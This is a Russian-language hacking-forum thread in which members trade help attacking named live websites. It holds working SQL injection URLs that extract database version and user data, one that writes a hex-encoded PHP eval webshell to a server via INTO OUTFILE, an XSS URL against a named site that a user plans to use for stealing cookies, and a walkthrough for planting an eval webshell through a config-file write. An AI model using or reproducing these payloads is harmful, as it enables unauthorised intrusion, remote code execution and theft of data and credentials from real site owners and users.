Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. z0mbie86

    z0mbie86 New Member

    Joined:
    25 Jul 2009
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    Что неправильно делаю? file_priv=y

    Code:
    http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(0x2533433F7068702532306576616C28245F524551554553545B636D645D293B25)/**/from/**/fontan.mp_gw_auth/**/into/**/outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E72752F7368656C6C),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
     
  2. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Code:
    outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E72752F7368656C6C)
    Хекс не прокатит с OUTFILE.

    Есть вариант со встроенными запросами.
     
  3. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Ну, судя по страничке, там в коде выполняется print_r($_REQUEST);

    XSS:
    http://marafet.net/include/ajax/modules/gallery/voteImage.php?a=%3Cscript%3Ealert(1)%3C/script%3E
     
    1 person likes this.
  4. =Zeus=

    =Zeus= Member

    Joined:
    10 Aug 2009
    Messages:
    213
    Likes Received:
    54
    Reputations:
    5
    Спасибо большое, на крайняк хоть кукисы утяну.
     
  5. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    почистил по просьбе.
     
    #18085 Boolean, 21 Oct 2011
    Last edited: 5 Nov 2011
  6. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Версию и юзера вывел
    http://protein.7910.org/product_info.php/products_id/125'and(select*from(select(name_const(concat_ws(0x 3a,version(),user()),1)),name_const(concat_ws(0x3a ,version(),user()),1))a)and'
    Как щас вывести таблицы из information_schema.tables, какой должен быть запрос?
     
  7. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Зачем пытаться проводить инъекцию как в Insert запросах, тем самым усложняя себе жизнь?

    Что мешало сделать просто вот так:
    http://protein.7910.org/product_info.php/products_id/126'%20and%201=3%20union%20select%201,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16%20--%20

    ?)
     
  8. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    есть ли способ выполнить не sql запрос а php код внутри кавычек
    к примеру такой вариант
    PHP:
    <?php

    $_GET
    ['ID'] = addslashes ($_GET['ID']); //фильтрация 

    $fh fopen("z:/TEST.PHP","w");
    fwrite($fh,"log = "."'".$_GET['ID']."'");
    fclose($fh);

    ?>
    создаеться файл TEST.PHP с профильтрованным содержимым id
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    814
    Reputations:
    848
    да возможно, так как функция addslashes(); добовляет слешь к ковычкам, а в пхп элементарно даже можно выполнить <? phpinfo(); ?>, вопрос следущий, куда здесь добавиться слешь))
     
    _________________________
  10. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Вообще-то как-такового варианта обхода нет.
     
    1 person likes this.
  11. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    то есть выполнить php код не получиться
    а вариант с мультибайтовыми кодировками ?
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    814
    Reputations:
    848
    Тока что проверял у себя на локал хосте скрипт, если пораметру id присвоить значение, к примеру "<? phpinfo(); ?>", то в файл TEST.PHP, записывается такая информация "log = '<? phpinfo(); ?>'", следовательно так как сам фаел имеет расширение php и в самом нем прописывается теги на выполнение пхп он и выполняется, попробуй у себя протестировать и все поймешь, у себя на локалхосте я делал так:
    P.S.: вот намерено вставил в код кавычку и вот что получилось в файле
     
    _________________________
    #18092 winstrool, 22 Oct 2011
    Last edited: 22 Oct 2011
  13. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    а, понял о чем, видимо файл юзается как файл настроек.
    т.е. начало идет прямо с log=' ?)
    Если да, то круто.
     
  14. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    да файл используеться как хранилище настроек но в виде php массива
    и увы теги php находяться в начале файла и недоступны
    надежда была только на то что в php есть и другие символы короме кавычки и слеша имеющие особые свойства
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    просто записываешь это

    .php?ID=<?php eval($_POST[1]);?> и все
     
    2 people like this.
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    И что выйдет из этого? Значение переменной ID попадут в одинарную кавычку, и PHP интерпретатор будет считать это обычным текстом, а не php кодом.
     
    _________________________
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Посмотри код внимательнее, параметр w при открытии файла - соответственно весь файл будет очищен, и создаться файл с текстом:
    TEST.PHP:
    PHP:
    log = '<?php eval($_POST[1]);?>'
    Ну и открываем файл TEST.PHP в браузере.
     
    1 person likes this.
  18. L0ST_DrEaM

    L0ST_DrEaM Member

    Joined:
    4 Feb 2009
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Очень интересует что происходит в данном случае?
    WebCruiser`ом сливаю базу, а она, как видно на скрине идет какими-то закорючками)

    [​IMG]
     
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    народ помогите разкрутить скулю, не мойму как дальше
    http://www.lcoastpress.com/journal.php?id=7'
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.lcoastpress.com/journal.php?id=7+or+1+group+by+concat((select+version()),floor(rand(0)*2))having+min(0)+or+1--+
     
    _________________________
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.